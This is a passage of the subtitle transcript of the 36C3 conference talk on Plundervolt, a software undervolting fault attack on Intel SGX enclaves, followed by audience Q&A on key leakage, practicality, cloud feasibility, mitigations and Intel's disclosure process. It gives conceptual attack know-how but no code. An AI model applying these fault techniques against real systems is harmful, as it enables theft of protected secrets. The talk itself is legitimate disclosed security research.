    undervolting. Besh, we've written
  • 32:10 - 32:15
    something that was in the enclave out of
    the enclave. And I'm just going to display
  • 32:15 - 32:19
    the page of memory that we've got there to
    show you what it was. And there's the one
  • 32:19 - 32:25
    line, it's deadbeef And again, I'm just
    going to look in my source code to see
  • 32:25 - 32:30
    what it was. Yeah, it's, you know you
    know, endianness blah, blah, blah. I have
  • 32:30 - 32:36
    now not even used crypto. I have purely
    used pointer arithmetic to take something
  • 32:36 - 32:43
    that was stored inside Intel's SGX and
    moved it into user space where anyone can
  • 32:43 - 32:46
    read it.
    Daniel: So, yes, I get your point. It's
  • 32:46 - 32:49
    more than just crypto, right?
    Kit: Yeah.
  • 32:49 - 32:57
    Daniel: It's way beyond that. So we, we
    leaked RSA keys. We leaked AES keys.
  • 32:57 - 33:01
    Kit: Go on... Yeah, we did not just that
    though we did memory corruption.
  • 33:01 - 33:06
    Daniel: Okay, so. Yeah. Okay. Crypto Vault
    Screw Hammer, point taken, is not the
  • 33:06 - 33:11
    ideal name, but maybe you could come up
    with something. We need a name and a logo.
  • 33:11 - 33:14
    Kit: So pressures on me then. Right, here
    we go. So it's got to be due to
  • 33:14 - 33:21
    undervolting because we're undervolting.
    Maybe we can get a pun on vault and volt
  • 33:21 - 33:26
    in there somewhere. We're stealing
    something, aren't we? We're corrupting
  • 33:26 - 33:31
    something. Maybe. Maybe we're plundering
    something.
  • 33:31 - 33:32
    Daniel: Yeah?
    Kit: I know.
  • 33:32 - 33:33

    Daniel: No?
  • 33:33 - 33:37
    Kit: Let's call it plunder volt.
    Daniel: Oh, no, no, no. That's not it.
  • 33:37 - 33:38
    That's not a good nane.
    Kit: What?
  • 33:38 - 33:43
    Daniel: That, no. We need something...
    That's really not a good name. People will
  • 33:43 - 33:51
    hate this name.
    Kit: Wait, wait, wait, wait, wait.
  • 33:51 - 33:54
    Daniel: No...
    Laughter
  • 33:54 - 33:57
    Kit: You can read this if you like,
    Daniel.
  • 33:57 - 34:01
    Daniel: Okay. I, I think I get it. I, I
    think I get it.
  • 34:01 - 34:17
    Kit: No, no, I haven't finished.
    Laughter
  • 34:17 - 34:35
    Daniel: Okay. Yeah, this is really also a
    very nice comment. Yes. The quality of the
  • 34:35 - 34:38
    videos, I think you did a very good job
    there.
  • 34:38 - 34:41
    Kit: Thank you.
    Daniel: Also, the website really good job
  • 34:41 - 34:43
    there.
    Kit: So, just to summarize, what we've
  • 34:43 - 34:53
    done with plunder volt is: It's a new type
    of attack, it breaks the integrity of SGX.
  • 34:53 - 34:57
    It's within SGX. We're doing stuff we
    shouldn't be able to.
  • 34:57 - 35:01
    Daniel: Like AES keys, we leak AES keys,
    yeah.
  • 35:01 - 35:06
    Kit: And we are retrieving the RSA
    signature key.
  • 35:06 - 35:11
    Daniel: Yeah. And yes, we induced memory
    corruption in bug free code.
  • 35:11 - 35:20
    Kit: And we made the Enclave write Secrets
    to untrusted memory. This is the paper,
  • 35:20 - 35:28
    that's been accepted next year. It is my
    first paper, so thank you very much. Kit,
  • 35:28 - 35:30
    that's me.
    Applause
  • 35:30 - 35:39
    Kit: Thank you. David Oswald, Flavio
    Garcia, Jo Van Bulck and of course, the
  • 35:39 - 35:46
    infamous and Frank Piessens. So all that
    really remains for me to do is to say,
  • 35:46 - 35:49
    thank you very much for coming...
    Daniel: Wait a second, wait a second.
  • 35:49 - 35:53
    There's one more thing, I think you
    overlooked one of the tweets I added it
  • 35:53 - 35:57
    here. You didn't see this slide yet?
    Kit: I haven't seen this one.
  • 35:57 - 36:01
    Daniel: This one, I really like it.
    Kit: It's a slightly ponderous pun on
  • 36:01 - 36:06
    Thunderbolt... pirate themed logo.
    Daniel: A pirate themed logo. I really
  • 36:06 - 36:13
    like it. And if it's a pirate themed logo,
    don't you think there should be a pirate
  • 36:13 - 36:16
    themed song?
    Laughter
  • 36:16 - 36:25
    Kit: Daniel, have you written a pirate
    theme song? Go on then, play it. Let's,
  • 36:25 - 36:37
    let's hear the pirate theme song.
    music -- see screen --
  • 36:37 - 37:09
    Music: ...Volt down me enclaves yo ho. Aye
    but it's fixed with a microcode patch.
  • 37:09 - 37:30
    Volt down me enclaves yo ho.
    Daniel: Thanks to...
  • 37:30 - 37:44
    Applause
    Daniel: Thanks to Manuel Weber and also to
  • 37:44 - 37:47
    my group at Theo Graz for volunteering for
    the choir.
  • 37:47 - 37:52
    Laughter
    Daniel: And then, I mean, this is now the
  • 37:52 - 37:59
    last slide. Thank you for your attention.
    Thank you for being here. And we would
  • 37:59 - 38:02
    like to answer questions in the Q&A
  • 38:02 - 38:07
    Applause
  • 38:07 - 38:14
    Herald: Thank you for your great talk. And
    thank you some more for the song. If you
  • 38:14 - 38:19
    have questions, please line up on the
    microphones in the room. First question
  • 38:19 - 38:23
    goes to the signal angel, any question
    from the Internet?
  • 38:23 - 38:27
    Signal-Angel: Not as of now, no.
    Herald: All right. Then, microphone number
  • 38:27 - 38:30
    4, your question please.
    Microphone 4: Hi. Thanks for the great
  • 38:30 - 38:35
    talk. So, why does this happen now? I
    mean, thanks for the explanation for wrong
  • 38:35 - 38:38
    number, but it wasn't clear. What's going
    on there?
  • 38:38 - 38:47
    Daniel: So, too, if you look at circuits
    for the signal to be ready at the output,
  • 38:47 - 38:54
    they need, electrons have to travel a bit.
    If you increase the voltage, things will
  • 38:54 - 39:00
    go faster. So they will, you will have the
    output signal ready at an earlier point in
  • 39:00 - 39:05
    time. Now the frequency that you choose
    for your processor should be related to
  • 39:05 - 39:09
    that. So if you choose the frequency too
    high, the outputs will not be ready yet at
  • 39:09 - 39:13
    this circuit. And this is exactly what
    happens, if you reduce the voltage the
  • 39:13 - 39:17
    outputs are not ready yet for the next
    clock cycle.
  • 39:17 - 39:23
    Kit: And interestingly, we couldn't fault
    really short instructions. So anything
  • 39:23 - 39:26
    like an add or an xor, it was basically
    impossible to fault. So they had to be
  • 39:26 - 39:31
    complex instructions that probably weren't
    finishing by the time the next clock tick
  • 39:31 - 39:32
    arrived.
    Daniel: Yeah.
  • 39:32 - 39:36
    Microphone 4: Thank you.
    Herald: Thanks for your answer. Microphone
  • 39:36 - 39:39
    number 4 again.
    Microphone 4: Hello. It's a very
  • 39:39 - 39:45
    interesting theoretical approach I think.
    But you were capable to break these crypto
  • 39:45 - 39:53
    mechanisms, for example, because you could
    do zillions of iterations and you are sure
  • 39:53 - 39:58
    to trigger the fault. But in practice,
    say, as someone is having a secure
  • 39:58 - 40:04
    conversation, is it practical, even close
    to a possible too to break it with that?
  • 40:04 - 40:08
    Daniel: It totally depends on your threat
    model. So what can you do with the
  • 40:08 - 40:13
    enclave? If you, we are assuming that we
    are running with root privileges here and
  • 40:13 - 40:17
    a root privileged attacker can certainly
    run the enclave with certain inputs, again
  • 40:17 - 40:22
    and again. If the enclave doesn't have any
    protection against replay, then certainly
  • 40:22 - 40:26
    we can mount an attack like that. Yes.
    Microphone 4: Thank you.
  • 40:26 - 40:31
    Herald: Signal-Angel your question.
    Signal: Somebody asked if the attack only
  • 40:31 - 40:34
    applies to Intel or to AMD or other
    architectures as well.
  • 40:34 - 40:38
    Kit: Oh, good question, I suspect right
    now there are people trying this attack on
  • 40:38 - 40:42
    AMD in the same way that when clock screw
    came out, there were an awful lot of
  • 40:42 - 40:47
    people starting to do stuff on Intel as
    well. We saw the clock screw attack on ARM
  • 40:47 - 40:52
    with frequency. Then we saw ARM with
    voltage. Now we've seen Intel with
  • 40:52 - 40:57
    voltage. And someone else has done similar
    Volt pwn has done something very similar
  • 40:57 - 41:02
    to us. And I suspect AMD is the next one.
    I guess, because it's not out there as
  • 41:02 - 41:07
    much. We've tried to do them in the order
    of, you know, scaring people.
  • 41:07 - 41:10
    Laughter
    Kit: Scaring as many people as possible as
  • 41:10 - 41:14
    quickly as possible.
    Herald: Thank you for the explanation.
  • 41:14 - 41:18
    Microphone number 4.
    Microphone 4: Hi. Hey, great. Thanks for
  • 41:18 - 41:25
    the representation. Can you get similar
    results by Harrower? I mean by tweaking
  • 41:25 - 41:28
    the voltage that you provide to the CPU
    or...
  • 41:28 - 41:33
    Kit: Well, I refer you to my earlier
    answer. I know for a fact that there are
  • 41:33 - 41:37
    people doing this right now with physical
    hardware, seeing what they can do. Yes,
  • 41:37 - 41:41
    and I think it will not be long before
    that paper comes out.
  • 41:41 - 41:47
    Microphone 4: Thank you.
    Herald: Thanks. Microphone number one.
  • 41:47 - 41:51
    Your question. Sorry, microphone 4 again,
    sorry.
  • 41:51 - 41:58
    Microphone 4: Hey, thanks for the talk.
    Two small questions. One, why doesn't
  • 41:58 - 42:08
    anything break inside SGX when you do
    these tricks? And second one, why when you
  • 42:08 - 42:15
    write outside the enclaves memory, their
    value is not encrypted.
  • 42:15 - 42:22
    Kit: So the enclave is an encrypted area
    of memory. So when it points to an
  • 42:22 - 42:24
    unencrypted, it's just
    going to write it to the unencrypted
  • 42:24 - 42:29
    memory. Does that make sense?
    Daniel: From the enclaves perspective,
  • 42:29 - 42:33
    none of the memory is encrypted. This is
    just transparent to the enclave. So if the
  • 42:33 - 42:37
    enclave will write to another memory
    location. Yes, it just won't be encrypted.
  • 42:37 - 42:41
    Kit Yeah. And what's happening is we're
    getting flips in the registers. Which is
  • 42:41 - 42:44
    why I think we're not getting an integrity
    check because the enclave is completely
  • 42:44 - 42:48
    unaware that anything's even gotten wrong.
    It's got a value in its memory and it's
  • 42:48 - 42:51
    gonna use it.
    Daniel: Yeah. The integrity check is only
  • 42:51 - 42:55
    on the on the memory that you logged from
    RAM. Yeah.
  • 42:55 - 43:03
    Herald: Okay, microphone number 7.
    Microphone 7: Yeah. Thank you. Interesting
  • 43:03 - 43:12
    work. I was wondering, you showed us the
    example of the code that wrote outside the
  • 43:12 - 43:17
    Enclave Memory using simple pointer
    arithmetics. Have you been able to talk to
  • 43:17 - 43:24
    Intel why this memory access actually
    happens? I mean, you showed us the output
  • 43:24 - 43:29
    of the program. It crashes, but
    nevertheless, it writes the result to the
  • 43:29 - 43:34
    resulting memory address. So there must be
    something wrong, like the attack that
  • 43:34 - 43:40
    happened two years ago at the Congress
    about, you know, all that stuff.
  • 43:40 - 43:46
    Daniel: So generally enclaves can read and
    write any memory location in their host
  • 43:46 - 43:53
    application. We have also published papers
    that basically argued that this might not
  • 43:53 - 44:00
    be a good idea, good design decision. But
    that's the current design. And the reason
  • 44:00 - 44:05
    is that this makes interaction with the
    enclave very easy. You can just place your
  • 44:05 - 44:09
    payload somewhere in the memory. Hand the
    pointer to the enclave and the enclave can
  • 44:09 - 44:14
    use the data from there, maybe copy it
    into the enclave memory if necessary, or
  • 44:14 - 44:20
    directly work on the data. So that's why
    this memory access to the normal memory
  • 44:20 - 44:24
    region is not illegal.
    Kit: And if you want to know more, you can
  • 44:24 - 44:29
    come and find Daniel afterwards.
    Herald: Okay. Thanks for the answer.
  • 44:29 - 44:33
    Signal-Angel, the questions from the
    Internet.
  • 44:33 - 44:39
    Signal-Angel: Yes. The question came up. If, how
    stable the system you're attacking with
  • 44:39 - 44:42
    the hammering
    is while you're performing their attack.
  • 44:42 - 44:46
    Kit: It's really stable. Once I've been
    through three months of crashing the
  • 44:46 - 44:50
    computer. I got to a point where I had a
    really, really good frequency voltage
  • 44:50 - 44:56
    combination. And we did discover on all
    Intel chips, it was different. So even, on
  • 44:56 - 44:59
    what looked like and we bought almost an
    identical little nook, we bought one with
  • 44:59 - 45:06
    exactly the same spec and it had a
    different sort of frequency voltage model.
  • 45:06 - 45:10
    But once we'd done this sort of
    benchmarking, you could pretty much do any
  • 45:10 - 45:15
    attack without it crashing at all.
    Daniel: But without this benchmarking,
  • 45:15 - 45:18
    it's true. We would often reboot.
    Kit: That was a nightmare yeah, I wish I'd
  • 45:18 - 45:20
    done that the beginning. It would've saved
    me so much time.
  • 45:20 - 45:25
    Herald: Thanks again for answering.
    Microphone number 4 your question.
  • 45:25 - 45:29
    Microphone 4: Can Intel fix this with a
    microcode update?
  • 45:29 - 45:37
    Daniel: So, there are different approaches
    to this. Of course, the quick fix is to
  • 45:37 - 45:42
    remove the access to the MSR, which is of
    course inconvenient because you can't
  • 45:42 - 45:45
    undervolt your system anymore. So maybe
    you want to choose whether you want to use
  • 45:45 - 45:51
    SGX or want to have a gaming computer
    where you undervolt the system or control
  • 45:51 - 45:56
    the voltage from software. But is this a
    real fix? I don't know. I think there are
  • 45:56 - 45:59
    more vectors, right?
    Kit: Yeah.But, well I'll be interested to
  • 45:59 - 46:01
    see what they're going to do with the next
    generation of chips.
  • 46:01 - 46:05
    Daniel: Yeah.
    Herald: All right. Microphone number 7,
  • 46:05 - 46:09
    what's your question?
    Microphone 7: Yes, similarly to the other
  • 46:09 - 46:14
    question, is there a way you can prevent
    such attacks when writing code that runs
  • 46:14 - 46:18
    in the secure enclave?
    Kit: Well, no. That's the interesting
  • 46:18 - 46:23
    thing, it's really hard to do. Because we
    weren't writing code with bugs, we were
  • 46:23 - 46:27
    just writing normal pointer arithmetic.
    Normal crypto. If anywhere in your code,
  • 46:27 - 46:30
    you're using a multiplication. It can be
    attacked.
  • 46:30 - 46:35
    Daniel: But of course, you could use fault
    resistant implementations inside the
  • 46:35 - 46:39
    enclave. Whether that is a practical
    solution is yet to be determined
  • 46:39 - 46:42
    Kit: Oh yes, yea, right, you could write
    duplicate code and do comparison things
  • 46:42 - 46:47
    like that. But if, yeah.
    Herald: Okay. Microphone number 3. What's
  • 46:47 - 46:48
    your question?
  • 46:48 - 46:53
    Microphone 3: Hi. I can't imagine Intel
    being very happy about this and recently
  • 46:53 - 46:57
    they were under fire for how they were
    handling a coordinated disclosure. So can
  • 46:57 - 47:01
    you summarize experience?
    Kit: They were... They were really nice.
  • 47:01 - 47:06
    They were really nice. We disclosed really
    early, like before we had all of the
  • 47:06 - 47:09
    attacks.
    Daniel: We just had a POC at that point.
  • 47:09 - 47:11
    Kit: Yeah.
    Daniel: Yeah, Simply POC. Very simple.
  • 47:11 - 47:15
    Kit: They've been really nice. They wanted
    to know what we were doing. They wanted to
  • 47:15 - 47:19
    see all our attacks. I found them lovely.
    Daniel: Yes.
  • 47:19 - 47:22
    Kit: Am I allowed to say that?
    Laughter
  • 47:22 - 47:25
    Daniel: I mean, they also have interest
    in...
  • 47:25 - 47:27
    Kit: Yeah.
    Daniel ...making these processes smooth.
  • 47:27 - 47:30
    So that vulnerability researchers also
    report to them.
  • 47:30 - 47:32
    Kit: Yeah.
    Daniel: Because if everyone says, oh this
  • 47:32 - 47:38
    was awful, then they will also not get a
    lot of reports. But if they do their job
  • 47:38 - 47:40
    well and they did in our case.
    Kit: Yeah.
  • 47:40 - 47:44
    Daniel: Then of course, it's nice.
    Herald: Okay. Microphone number 4...
  • 47:44 - 47:48
    Danie: We even got a bug bounty.
    Kit: We did get a bug bounty. I didn't
  • 47:48 - 47:51
    want to mention that because I haven't
    told my university yet.
  • 47:51 - 47:55
    Laughter
    Microphone 4: Thank you. Thank you for the
  • 47:55 - 48:02
    funny talk. If I understood, you're right,
    it means to really be able to exploit
  • 48:02 - 48:07
    this. You need to do some benchmarking on
    the machine that you want to exploit. Do
  • 48:07 - 48:15
    you see any way to convert this to a
    remote exploit? I mean, that to me, it
  • 48:15 - 48:20
    seems you need physical access right now
    because you need to reboot the machine.
  • 48:20 - 48:24
    Kit: If you've done benchmarking on an
    identical machine, I don't think you would
  • 48:24 - 48:27
    have to have physical access.
    Daniel: But you would have to make sure
  • 48:27 - 48:30
    that it's really an identical machine.
    Kit: Yeah.
  • 48:30 - 48:33
    Daniel: But in the cloud you will find a
    lot of identical machines.
  • 48:33 - 48:41
    Laughter
    Herald: Okay, microphone number 4 again.
  • 48:41 - 48:46
    Daniel: Also, as we said, like the
    temperature plays an important role.
  • 48:46 - 48:48
    Kit: Yeah.
    Daniel: You will also in the cloud find a
  • 48:48 - 48:52
    lot of machines at similar temperatures
    Kit: And there was, there is obviously
  • 48:52 - 48:56
    stuff that we didn't show you. We did
    start measuring the total amount of clock
  • 48:56 - 49:00
    ticks it took to do maybe 10 RSA
    encryption. And then we did start doing
  • 49:00 - 49:04
    very specific timing attacks. But
    obviously it's much easier to just do
  • 49:04 - 49:10
    10000 of them and hope that one faults.
    Herald: All right. Seems there are no
  • 49:10 - 49:14
    further questions. Thank you very much for
    your talk. For your research and for
  • 49:14 - 49:15
    answering all the questions.
    Applause
  • 49:15 - 49:19
    Kit: Thank you.
    Daniel: Thank you.
  • 49:19 - 49:22
    postroll music
  • 49:22 - 49:48
    subtitles created by c3subtitles.de
    in the year 20??. Join, and help us!
Title:
36C3 - Plundervolt: Flipping Bits from Software without Rowhammer
Description:

more » « less
Video Language:
English
Duration:
49:48

English subtitles

Revisions